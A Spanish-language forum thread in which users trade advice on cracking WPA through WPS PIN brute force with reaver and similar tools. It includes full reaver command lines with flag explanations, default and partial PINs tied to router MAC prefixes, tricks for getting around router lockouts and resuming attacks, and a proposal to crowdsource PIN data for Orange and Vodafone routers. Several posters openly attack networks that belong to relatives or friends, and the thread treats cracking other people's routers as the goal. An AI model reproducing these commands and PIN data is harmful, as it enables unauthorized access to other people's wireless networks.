P4nd3m0n1um : Hola buenas he estado probando con una Mac 00:19:70 este pin : 64960584 resulta que se me pone al 90 por ciento vale, le doy atacar con el mismo pin nada mas se desbloqueo y me salto con otro pin muy parecido que es este 64960584 con este ultimo pin que me dio me lanza igual que el otro M1,M2,M3,M4 después al rato pone recibiendo y esperando respuesta, lo que pone en ingles el reaver o el wpscragui cuando se bloquea el router y se me queda al 91 por ciento y pone 6 segundos pero sigue dando las misma respuestas esto que kiere decir, que no es el pin correcto verdad y no lo va sacar o parte del pin si es correcto y otra cosa que he estado pensado una cosa no se si sera una tontería haber que opináis los demás  si yo capturo el handshake como ya sabemos viene dentro la clave verdad ya sea por defecto o sea una frase personal, y la única forma es por Diccionarios (FUERZA BRUTA) o por el reaver con el wps como ya sabemos son las únicas formas aora mi pregunta es la siguiente ¿ Si yo hago un diccionario con todo los posibles pines de la red que estoy atacando atreves del wps  pasándolo por el aircrack-ng podría encontrarme el posible pin correcto de esa red ? que yo quiero sacar atreves del pin con el reaber o es imposible o es que en la captura del handshake  solo viene la frase o la clave por defecto no vienes mas información


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Agosto 2012, 02:02 am
si le especificas el pin 64960584, siempre va a probar ese, si te dio un M4, los primeros 4 (6496) están bien y los demás mal.. especifica solamente los primeros 4 y vemos.


Título: WPS TP-LINK!
Publicado por: P4nd3m0n1um en 31 Agosto 2012, 02:15 am
TP-Link adiciona funciones contra los ataques de WPS... En sus nuevos routers TL-WR740N y TL-WR741ND:

Enhanced WPS(QSS) function to prevent illegal hacking;
(WPS mejorados (QSS) para prevenir la piratería ilegal;)

Pero aunque actualicemos el filmware con la versión parcheada.. nos encontramos con:

(http://i.minus.com/il10OKcTv1UEu.PNG)

El WPS (QSS) sigue habilitado por Defecto.. cosa que principalmente no deberia estar habilitado.. adicionalmente estuve realizando unos ataques para verificar cual seria la mejora.. nada... genere varios pines y nada se crackean muy rapido sin problemas de conexion ni nada por el estilo.

Código:
90-F6-52-F7-2C-84 42235958 (Predeterminado no por defecto.)      1 Hora.
90-F6-52-F7-2C-84 37854768                                                   
90-F6-52-F7-2C-84 92012554                                                   
90-F6-52-F7-2C-84 71598819                                                   
90-F6-52-F7-2C-84 52660313                                                   
90-F6-52-F7-2C-84 76410109
90-F6-52-F7-2C-84 44417994
90-F6-52-F7-2C-84 96054727
90-F6-52-F7-2C-84 46505491
90-F6-52-F7-2C-84 07388460


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 31 Agosto 2012, 02:19 am
si siempre que le meto el PIN:64960584 pero una cosa que te iba ha decir tu dices que los  4 primeros seguro que estan bien verdad despues de meter dos veces el mismo PIN me salta con otro distinto pero muy parecido al pin  que te he dicho antes que es este que te pongo aquí 64960586 y aora pruebo con ese y se pone al 91 por ciento me da tambien el M4 y ya se keda bloqueado el router como averiguo yo los otros numeros restante que hago pandemonium para averiguar los 4 restantes para que el pin sea correcto meto los 4 primeros digitos y que vaya probando solo, o otra cosa que pensé es la pregunta que echo anterior cojee los 4 primeros números del pin que se supone que están correctos y hacer un diccionario y pasarlo por el aircrack-ng todo esto capturando el handshake y ver si me da el pin correcto el aircrack-ng tirandole el diccionario creado por el pin o esto es una tonteria y no se puede hacer dime


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 31 Agosto 2012, 02:54 am
elsevi yo creo que eso que tu dices no es posible te voy a decir porque...
cuando tu caturas el apreton de manos o handshake tu capturas una clave de acceso no? eso lo sabe cualquiera y con un diccionario si la clave esta hay zas! te la muestra en pantalla (la clave del router) pero si hciesemos eso que tu dices de hacer un diccionario de pines (que seria una buena opcion) el aircrack no te sacaria el pin ni la clave porque lo que tu as capturado es la clave del router no el pin y aunque sepas los 4 primeros numeros de nada te sirve o ese es mi punto de vista yo creo que lo que tu dices hoy en dia no se puede hacer... corregirme si me equivoco.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 31 Agosto 2012, 02:55 am
por cierto P4nd3m0n1um como ha puesto tu la imagen? esque quiero mostraros un ataque por reaver pero nose como. La foto primero se sube a la web o como va? salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 31 Agosto 2012, 03:00 am
elsevi ya te e dejado los datos basicos de una orange-xxxx con mac c0:ac:54 creo que un amigo mio tiene una orange con mac 00:19:70 pero no estoy seguro mañana te digo salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Agosto 2012, 03:11 am
si siempre que le meto el PIN:64960584 pero una cosa que te iba ha decir tu dices que los  4 primeros seguro que estan bien verdad despues de meter dos veces el mismo PIN me salta con otro distinto pero muy parecido al pin  que te he dicho antes que es este que te pongo aquí 64960586 y aora pruebo con ese y se pone al 91 por ciento me da tambien el M4 y ya se keda bloqueado el router como averiguo yo los otros numeros restante que hago pandemonium para averiguar los 4 restantes para que el pin sea correcto meto los 4 primeros digitos y que vaya probando solo, o otra cosa que pensé es la pregunta que echo anterior cojee los 4 primeros números del pin que se supone que están correctos y hacer un diccionario y pasarlo por el aircrack-ng todo esto capturando el handshake y ver si me da el pin correcto el aircrack-ng tirandole el diccionario creado por el pin o esto es una tonteria y no se puede hacer dime

Mister-X no le dio soporte aun al WPS bajo la suite aircrack-ng.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Agosto 2012, 03:13 am
por cierto P4nd3m0n1um como ha puesto tu la imagen? esque quiero mostraros un ataque por reaver pero nose como. La foto primero se sube a la web o como va? salu2

capturas y la mandas a minus.com y pones el link entre [ img ] [ /img ]


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 31 Agosto 2012, 03:50 am
Mister-X no le dio soporte aun al WPS bajo la suite aircrack-ng esto que quieres decir P4nd3m0n1um mister x quien es ? haber que le tiene que dar soporte no entiendo yo digo hacer una cosa que se me ha ocurrido a mi no si se le habrá ocurrido a alguien mas de aquí haber por ejemplo haber si me entendéis EJEMPLO: PIN: 64960586 se supone que no encuentro el pin correcto de acuerdo , se supones que los 4 primeros numeros de este pin son correcto que son estos 64960 los otros restante no son valido verdad segun pandemonium al darme hasta el M4 pues cojer hacer un diccionario apartir de 64960 lo de mas varios numeros asin todos hasta que el aircrack-ng encuentre el pin correcto pero yo digo esto metiendole la capturar del handshake dentro de la captura tiene que vernir la clave y quien sabes si viene tambien el pin podria tambien venir como datos o no ?? me entiendes puedo hacer esto o no se que pensais o de otra forma.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Agosto 2012, 04:19 am
Mister-X no le dio soporte aun al WPS bajo la suite aircrack-ng esto que quieres decir P4nd3m0n1um mister x quien es ?

Mister-X o más conocido en el ambiente como Thomas d'Otreppe.. es el que escribio de toda la suite AirCrack-NG.. airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, airdriver-ng, aireplay-ng, airmon-ng, airodump-ng, airolib-ng, airserv-ng, airtun-ng, easside-ng, packetforge-ng, tkiptun-ng, wesside-ng y airdecloak-ng.. y que casi todos los días edita una nueva revisión http://nightly.aircrack-ng.org/aircrack-ng/trunk/

haber que le tiene que dar soporte

si quiere algun dia le va a dar soporte..

se me ha ocurrido a mi no si se le habrá ocurrido a alguien mas de aquí haber por ejemplo haber si me entendéis

lo hice en el WPSCrackGUI.. igual no tiene sentido si tienes los primeros 4 digitos, solo te falta menos de 3/4Horas para terminar el crackeo. Que es lo mismo por mas que generes el dic.

lo de mas varios numeros asin todos hasta que el aircrack-ng encuentre el pin correcto.

No existe el WPS en Aircrack-ng.

yo digo esto metiendole la capturar del handshake dentro de la captura tiene que vernir la clave

Si viene la clave WPA pre-compartida.. no viene el Pin el pin es como un candado... es muy simple la lógica.. XOR, el Router compara el pin de entrada con el que tiene en la memoria, si es correcto pone en 1 y da servicios, si no es correcto dará un 0 y no dará servicios.




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 82naros en 31 Agosto 2012, 04:48 am
hola P4nd3m0n1um te veo que estas muy puesto en el tema.Una pregunta.
cuando especificas un pin y directamente te da asta el M4 quiere decir que los primeros 4 digitos son correctos???si fuera asi solo tendria que hacer un nuevo ataque especificando los 4 primeros digitos y q el reaver busque los demas??
te lo pregunto porque si no es una perdida de tiempo ya que yo estou intentando orangexxxx y se bloquea a los pocos intentos,y tengo que esperar a que tenga un cliente para desbloquearlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Agosto 2012, 06:26 am
exacto


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 31 Agosto 2012, 17:18 pm
vale ya lo he entendido mejor meto los 4 primeros digito en el wpscragui y haber si encuentra los demas numeros que falta espero que no me cambie el pin de los 4 primeros digitos que le meta yo si suelta un M5 O M6 quieres decir que los 6 primeros numeros del pin son correcto si da el caso este pregunto en.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Septiembre 2012, 01:53 am
vale ya lo he entendido mejor meto los 4 primeros digito en el wpscragui y haber si encuentra los demas numeros que falta espero que no me cambie el pin de los 4 primeros digitos que le meta yo si suelta un M5 O M6 quieres decir que los 6 primeros numeros del pin son correcto si da el caso este pregunto en.

Sep.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 1 Septiembre 2012, 12:43 pm
¿Porque al poner directamente el pin me sale 100% pero no me da la pass?
reaver -i mon0 -p xxxxxxxx -c -b -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 1 Septiembre 2012, 15:31 pm
¿Porque al poner directamente el pin me sale 100% pero no me da la pass?
reaver -i mon0 -p xxxxxxxx -c -b -vv

reaver -i mon0 -b (la mac) -p xxxxxxxx -c (canal) -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Septiembre 2012, 22:13 pm
reaver -i mon0 -b (la mac) -p xxxxxxxx -c (canal) -vv

No es necesario especificar tanto ya que reaver suele ponerse tonto.. verifica cambiando de versiones..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Septiembre 2012, 22:24 pm
-i = Interfaz inalambrica en modo monitor.
-b = MAC Address de la red a Atacar.
-d = Tiempo de espera entre Pin y Pin; medido en segundos.
-vv = Muestra los datos completos del ataque.

Código:
reaver -i mon0 -b <MA:CA:DD:RR:EE:SS> -d 100 -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: skynet777 en 2 Septiembre 2012, 05:26 am
 ;D Hola estimado amigo "P4nd3m0n1um" quisiera saber si esta aplicacion funciona para obtener la clave WPA de cualquier router o AP, ya que he probado con algunos de la marca Broadtech y no funciona, me dice que no puede realizar el ataque, por otro lado tambien descargue la aplicacion Reaver-Pro el live-CD y de igual forma me indica que no puede realizar el ataque a esas redes  :huh:

Mi tarjeta de red que uso es una Alfa RTL8187L y tambien lo he probado con una Atheros AR5005, te digo que si me rastrea las señales sin problema pero no me permite atacarlas, bueno mas bien realizar la obtencion del PIN o de la clave  :huh:

Es que solo para ciertas redes funciona esta aplicacion  :huh:, las MAC's de estas redes son:
Broadtech
64:68:0C:XX:XX:XX
38:72:C0:XX:XX:XX
SpeedTouch
00:24:17:XX:XX:XX
00:1C:10:XX:XX:XX
Mientras que lo he probado con otros como Linksys, Cisco, Belkin, etc y si me funciona sin problemas.

Espero tu pronta respuesta, agradeciendote de antemano de tu ayuda y aporte.

Gracias.    :laugh: ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 2 Septiembre 2012, 12:54 pm
hola ahora mismo estoy con una red que se bloquea temporalmente una pergunta si pongo delay asin reaver -i mon0 -b mac -c 1 -d 100 -vv puedo evitar el bloqueo temporal con este comando me va mas lento saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 2 Septiembre 2012, 17:36 pm
;D Hola estimado amigo "P4nd3m0n1um" quisiera saber si esta aplicacion funciona para obtener la clave WPA de cualquier router o AP

No tiene que tener en WPS activado para poder realizar el ataque.

hola ahora mismo estoy con una red que se bloquea temporalmente una pergunta si pongo delay asin reaver -i mon0 -b mac -c 1 -d 100 -vv puedo evitar el bloqueo temporal con este comando me va mas lento saludos

Pueda que si como q no.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: skynet777 en 3 Septiembre 2012, 03:38 am
Gracias por contestar tan rapido, y te digo si tiene habilitado el WPS, entonces solo con algunas redes en especifico funciona el reaver  :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 3 Septiembre 2012, 03:49 am
Gracias por contestar tan rapido, y te digo si tiene habilitado el WPS, entonces solo con algunas redes en especifico funciona el reaver  :huh:


funcionan mal los chipsets o no tienen un driver indicado..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 3 Septiembre 2012, 11:15 am
hola tengo una red que me envia m6 estando en el 44% y no pasa al 90% y me envia esto
  • Sending M2 message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M2D message
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending WSC ACK
  • [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
    [!] WARNING: Last message not processed properly, reverting state to previous message
    [!] WARNING: Out of order packet received, re-trasmitting last message
  • Sending M6 message
  • [!] WARNING: Receive timeout occurred
  • Trying pin 99765675 lo veis normal y se queda pillado y lo tengo que reiniciar para pueda avanzar conseguire algo al final que opinais saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dyvap en 4 Septiembre 2012, 02:18 am
hola  he probado reaver con exito en el router de mi casa y en el de casa de mis primos ambos wifimedia de los que monta R aqui en galicia pero ahora estoy con el de casa de mi abuela es un vodafonexxxx con mac (creo que esto le interesara a GOolden) 64:16:F0:XX:XX:XX y wps activado comprobado con wireshark uso la alfa rtl8187 con wifiway 3.4 y el modulo reaver 1.4 con el comando reaver -i mon0 -b 64:16:F0:XX:XX:XX -c 11 -e vodafonexxxx -d 15 -vv pero no consigo nada el problema esta en que al nada de empezar me da el error wps transaction failed (code: 0x03) re-trying last pin
leyendo por ahi vi que hablaban de añadir el argumento --no-nacks para evitarlo y que vaya bien pero al añadirlo me da el error wps transaction failed (code: 0x02) re-trying last pin ya he probado mil soluciones añadirle argumentos quitarselos pero nada y la cara de idiota que se me queda cada vez es peor y aun por encima me hace un rato me ha parecido entender que este router es de los que se bloquean cada cierto numero de intentos como los de orange alguien podria ayudar a esta pobre alma (o a cualquier otro con el mismo problema) GOolden seras tu esa buena persona que solucionara mis problemas...? o sera otro...? gracias de antemano


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Septiembre 2012, 03:01 am
dyvap: Hola amigo tus problemas de que no saque la clave de Vodafon xxxx o orange-xxxx demomento no hay solucion ninguna por que yo llevo mucho tiempo intentando el tema  de como carajo sacar las orange atraves del reaver ,atraves de diccionario Fuerza bruta solo  tienes que leer en los  foros  de que todavía no ha sacado nadie una orange y vodafon demomento son casi imposible yo llevo mas el tema de las orange que son las que mas dolor de cabeza me han dado y demomento no saco nada en cocreto solo hay alguien de forma muy milagrosa saco una orange cosa que me extraño mucho por que tienes que dar con el pin correcto si no es para nada. siento desilucionarte.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dyvap en 4 Septiembre 2012, 03:41 am
si que se pueden sacar lo que pasa es que se bloquean despues de cierto numero de intentos pero hay un argumento para que mande los paquetes cada x tiempo y asi no se bloquee el problema no es ese el problema es que solo prueba el pin 12345670
y al salir el error se repite stodo el rato pero eso no es por lo del bloqueo porque una vez tambien probe en una orange de un amigo y por lo menos iba probando pines distintos hasta que se bloqueaba


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Septiembre 2012, 05:33 am
Haber te explico por experiencia por que yo soy unos de lo que mas veces he intentado sacar las orange-xxxx wpa2 vamos las mas complicadas hasta el momento que yo me he encontrado, el pin que tu dices que salen asín 12345670 eso lo prueba con la mayoria de lo router por que tu no le especifica el pin correcto o estas utilizando el wpscragui depende que version no se o el reaber yo cuando le meto un pin al reaver del wifislax 4.2 no me salta nunca con ese pin ya sigue probando el pin que yo le de claor si tu le das atacar normal te prueba primero el 12345670 y despues te saca un tanto por ciento y se keda bloqueado despues eso te saltara con otro pin pues lo que deberias de hacer es probar con el ultimo pin que te salio y volverlo a intentar yo ya lo echo de varias forma y a mi no me saca la clave nuncaa vamos ni a mi ni a nadie todavía solo uno dice que consegio sacarla y de forma milagrosa vamos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 4 Septiembre 2012, 11:03 am
dyvab yo tengo el mimo problema tu voy por el 45% y me se queda bloqueado y lo tengo reiniciar podrias decirme el pin que tiene ese router pideselo a tu abuela y si no te importa me lo dices por privado o en publico haber si poniedo el pin nos da la clave  ami algunas veces me envia m6 y no passa al 90% saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 4 Septiembre 2012, 11:37 am
Yo tb me estoy volviendo loco con las orange y con tp-link.
Concretamente con la orange, le especifico este pin 12345670 y me salta directamente al 90% pero a los diez intentos se me bloquea y no hay manera de sacarlo de ay( lleva 3 dias bloqueada). ¿alguna solucion P4nd3m0n1um?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dyvap en 4 Septiembre 2012, 14:15 pm
no me entendeis el problema es que no me llega a ningun tanto por ciento al atacar normal me da error (0x02 o 0x03) y no pasa del primer pin se queda en 0.00% GOolden el pin es 38579362


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 4 Septiembre 2012, 14:29 pm
ahh vale dyvap a mi si me cambia de pin y tengo la misma alfa y por lo que veo elrouter esta en la casa de tu abuela es estraño a mi me sale lo mismo que a ti pero sube el porcentaje y va cambiando de pin puede ser que al router no le hayan asignado ningun pin pero que tenga el wps activado por que es raro sabes si este pin es por defecto para estas vodafone saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dyvap en 4 Septiembre 2012, 14:42 pm
no no se si es por defecto o se lo cambio alguien pero a ti tambien te da el error todo el rato? porque cuando probe en el orange me daba un error no recuerdo cual despues de un tiempo no cada vez que probaba un pin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 4 Septiembre 2012, 14:44 pm
no me entendeis el problema es que no me llega a ningun tanto por ciento al atacar normal me da error (0x02 o 0x03) y no pasa del primer pin se queda en 0.00% GOolden el pin es 38579362

Eso pasa porque, como ya han dicho, Reaver ve que ese router tiene, aparentemente el pin WPS activado pero en realidad no tiene ningún PIN asignado. No se puede hacer nada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 4 Septiembre 2012, 14:47 pm
dybap a mi si me cambia de pin averigua si tenia un pin por defecto asi podrian averiguar mas sobre estas redes estos router de vodafone no tenian el wps activado se lo han activado ahora bueno dame mas imformacion si eso saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Septiembre 2012, 17:20 pm
Haber ya lo  hemos dicho miles de veces estos route se bloquean rapido por que tiene un mecanimos de defensa que de tanto intentarlo se bloquea yo ya llevo tiempo con las orange el error que te puede salir es que el router se ha bloqueado tras varios intento es lo que hay si no pues cojemos nosotro el wpscragui lo modificamos con todos los datos que tenemos de lo router y que de posibles pines para sacar la clave no dicen que todo lo que sea linux se puede modificar hacer lo que nos de la gana pues cojemo estudiamos  algo de programacion o alguien que sepa y le damos los datos y que haga un diccionario especifico para los router de orange y vodafon y ya esta pienso yo la pena que yo no se nada de programacion pero puedo aportarle datos a la persona que haga algun programa para esto o modificarlo que pensais vosotros.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 4 Septiembre 2012, 17:41 pm
Yo las Orange y sus respectivos LiveBox, las doy, por ahora, por perdidas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 4 Septiembre 2012, 17:45 pm
A mi me pasa igual con las orange ya no se que hacer estoy buscando alguna forma nueva de poder sacar algo haber si tengo suerte.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 4 Septiembre 2012, 23:58 pm
Una duda que tengo:

Suponiendo el router se desbloqueara a los 2 dias, ¿es necesario tener el pc enchufado o lo puedo apagar y cuando falte poco para completar esos dias enchufarlo y estar atento para cuando se desbloquee?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 5 Septiembre 2012, 02:25 am
Una duda que tengo:

Suponiendo el router se desbloqueara a los 2 dias, ¿es necesario tener el pc enchufado o lo puedo apagar y cuando falte poco para completar esos dias enchufarlo y estar atento para cuando se desbloquee?

-Si utilizas el reaver desde un pendrive o una máquina virtual si puedes apagarlo, ya que automáticamente se va guardando el ataque.

Cuando el router esté desbloqueado, atacas de nuevo y antes de empezar te preguntará: Restore previous sesion for MAC:LA:QUE:SEA? N/Y (si quieres restaurar la sesión previa). Le das a Y. Continuará atacando por le porcentaje que iba.

-Si utilizas un cd/dvd, no. Ya que al apagarlo se perderían los datos guardados.

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 5 Septiembre 2012, 06:14 am
Haber ya lo  hemos dicho miles de veces estos route se bloquean rapido por que tiene un mecanimos de defensa que de tanto intentarlo se bloquea yo ya llevo tiempo con las orange el error que te puede salir es que el router se ha bloqueado tras varios intento es lo que hay si no pues cojemos nosotro el wpscragui lo modificamos con todos los datos que tenemos de lo router y que de posibles pines para sacar la clave no dicen que todo lo que sea linux se puede modificar hacer lo que nos de la gana pues cojemo estudiamos  algo de programacion o alguien que sepa y le damos los datos y que haga un diccionario especifico para los router de orange y vodafon y ya esta pienso yo la pena que yo no se nada de programacion pero puedo aportarle datos a la persona que haga algun programa para esto o modificarlo que pensais vosotros.

y si no hay patron no podemos hacer nada..  :silbar:



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 6 Septiembre 2012, 10:25 am
Estoy intentando usar reaver con un router orange a pesar del bloqueo ya conocido. Lei x aqui de usar el siguiente comando:
reaver -i mon0 -b mac -c 1 -d 100 -vv
me surgen 2 dudas:

-Es normal que vaya muy despacio al usar ese comando?? El porcentaje sube muy despacio....
-Como me se el pin le indico ademas de lo anterior el numero del pin pero solo acaba diciendome ket craked in x seconds y no me da la pass. ¿Porque?En este caso el comando que uso es el siguiente:

reaver -i mon0 -b mac -c 1 -p xxxxxxxx -d 100 -vv

muchas gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 6 Septiembre 2012, 18:47 pm
Estoy intentando usar reaver con un router orange a pesar del bloqueo ya conocido. Lei x aqui de usar el siguiente comando:
reaver -i mon0 -b mac -c 1 -d 100 -vv
me surgen 2 dudas:

-Es normal que vaya muy despacio al usar ese comando?? El porcentaje sube muy despacio....
-Como me se el pin le indico ademas de lo anterior el numero del pin pero solo acaba diciendome ket craked in x seconds y no me da la pass. ¿Porque?En este caso el comando que uso es el siguiente:

reaver -i mon0 -b mac -c 1 -p xxxxxxxx -d 100 -vv

muchas gracias

El comando -d significa delay (retraso) y ahí le indicas tú el número de segundos que quieres que pasen entre intento e intento. De ahí que el porcentaje suba tan despacio. No sé si esto evitará el bloqueo del LiveBox...

Lo segundo que comentas, no sé qué decirte, ya que ni indicándole el pin exacto, dices que no te da la clave, mis esperanzas, que eran casi nulas, desaparecen del todo.

Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: IMPEESA en 6 Septiembre 2012, 22:10 pm
buenas,
tengo una duda,
el reaver se me queda pegado cada 5% mas menos
y debo reiniciarlo para que siga...

los comandos que ocupo son:

Código:
reaver -i mon0 -b BSSID -c CANAL -a -s archivo.wpc -vv

encontre un programa que se llama "wpscrack"
(para poder usarlo en wifiway 3.4 tuve que instalar el scapy 2.2 y Pycrypto)

los comandos que ocupo son:

Código:
./wpscrack.py --iface mon0 -c xx:xx:xx:xx:xx:xx -b xx:xx:xx:xx:xx:xx --ssid ESSID -v

pero solo prueba un pin el "00000000"

que estoy haciendo mal??[/color]   :huh: :huh:

(http://4370.webcindario.com/instant4.png)

(http://4370.webcindario.com/instant3.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Septiembre 2012, 00:23 am
principalmente el wpscrack utiliza un metodo similar al del reaver pero usa un diccionario completo del 00000000 al 99999999; cosa que hace perder mucho mas tiempo qu el reaver mismo... de seguro tienes mal las dependencias por eso funciona nal, verifica de abrir el archivo y que tengas instalados todos los import si mal no recuerdo que son las librerias que utiliza.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 7 Septiembre 2012, 02:55 am
Y lo que dice P4nd3m0n1um es verdad necesitaríamos un patrón para las orange-xxxx para poder hacer un diccionario y meterse lo al wpscragui  pero también se puede hacer el patrón a través de los pines o no ?? bueno si alguien quiere aportar un posible patron de las orange que lo hagan aqui verdad o que habran un es post estais de acuerdo o no y que la gente vayan dando datos de sus router haber si podemos hacer un diccionario entre todos pienso yo para ese tipo de router llamado orange entre todos creeo podemos solo teneis que aportar cada uno un pokito y ya esta y que alguien sepa de programacion pienso yo si kereis   para que no tengamos que estar todo el rato con los mismo router ya aburre la verdad si no hacemos nada estoy ya desesperado con esos router.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Septiembre 2012, 04:45 am
Adicional si es RT3070 nunca te tendría que funcionar..  :P ya que no es compatible.

Y lo que dice P4nd3m0n1um es verdad necesitaríamos un patrón para las orange-xxxx para poder hacer un diccionario y meterse lo al wpscragui  pero también se puede hacer el patrón a través de los pines o no ?? bueno si alguien quiere aportar un posible patron de las orange que lo hagan aqui verdad o que habran un es post estais de acuerdo o no y que la gente vayan dando datos de sus router haber si podemos hacer un diccionario entre todos pienso yo para ese tipo de router llamado orange entre todos creeo podemos solo teneis que aportar cada uno un pokito y ya esta y que alguien sepa de programacion pienso yo si kereis   para que no tengamos que estar todo el rato con los mismo router ya aburre la verdad si no hacemos nada estoy ya desesperado con esos router.

y de algún lado sale.. la idea seria saber como obtenerlo.. ya que utilizando diccionarios seguirías en la misma, en cambio si generas el pin correcto lo pones y back.. horas ganadas...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mrbay88 en 7 Septiembre 2012, 12:57 pm
y de algún lado sale.. la idea seria saber como obtenerlo.. ya que utilizando diccionarios seguirías en la misma, en cambio si generas el pin correcto lo pones y back.. horas ganadas...

Estoy intentando usar reaver con un router orange a pesar del bloqueo ya conocido. Lei x aqui de usar el siguiente comando:
reaver -i mon0 -b mac -c 1 -d 100 -vv
me surgen 2 dudas:

-Es normal que vaya muy despacio al usar ese comando?? El porcentaje sube muy despacio....
-Como me se el pin le indico ademas de lo anterior el numero del pin pero solo acaba diciendome ket craked in x seconds y no me da la pass. ¿Porque?En este caso el comando que uso es el siguiente:

reaver -i mon0 -b mac -c 1 -p xxxxxxxx -d 100 -vv

muchas gracias

Yo creo que ni con el pin...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 7 Septiembre 2012, 13:16 pm
Yo creo que ni con el pin...


nada es imposible!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 7 Septiembre 2012, 15:23 pm
Es verdad con el diccionario estaríamos igual perdiendo el tiempo, haber pienso una cosa lo suyo seria recopilar todo los posibles pines de las orange y vodafon que son las que mas suenan y añadiserlo al wpscragui se puede hacer asín haber lo suyo seria abrir un es post y que todo el mundo vaya poniendo la mac y los pines y asin que vayan consultado esta idea la he visto en otros foros recopilando datos creo y pienso que aqui también podríamos hacerlo aquí tengo otro datos mas de una vodafon para quien le interese pero por favor aportar cosas idea nueva que no quede las cosas estancada en este foro que es bastante bueno si nosotros aportamos cosas podemos mejorarlo mas pienso yo no se vosotros que pensáis.


WPS PIN - 5198

ESSID - vodafonexxxy

MAC - 6a:a8:e4

WPA - 14: 13 letras mayúsculas y 1 número

WPS POR DEFECTO - SI

haber si alguien le sirve esto he buscado
 


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 7 Septiembre 2012, 16:39 pm
Lo doy por perdido, por lo menos las orange. Acabo de poner el comando -d 100 y cuando llega o.14% me salta el bloqueo. Creo que no hay nada que hacer..... :-(


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
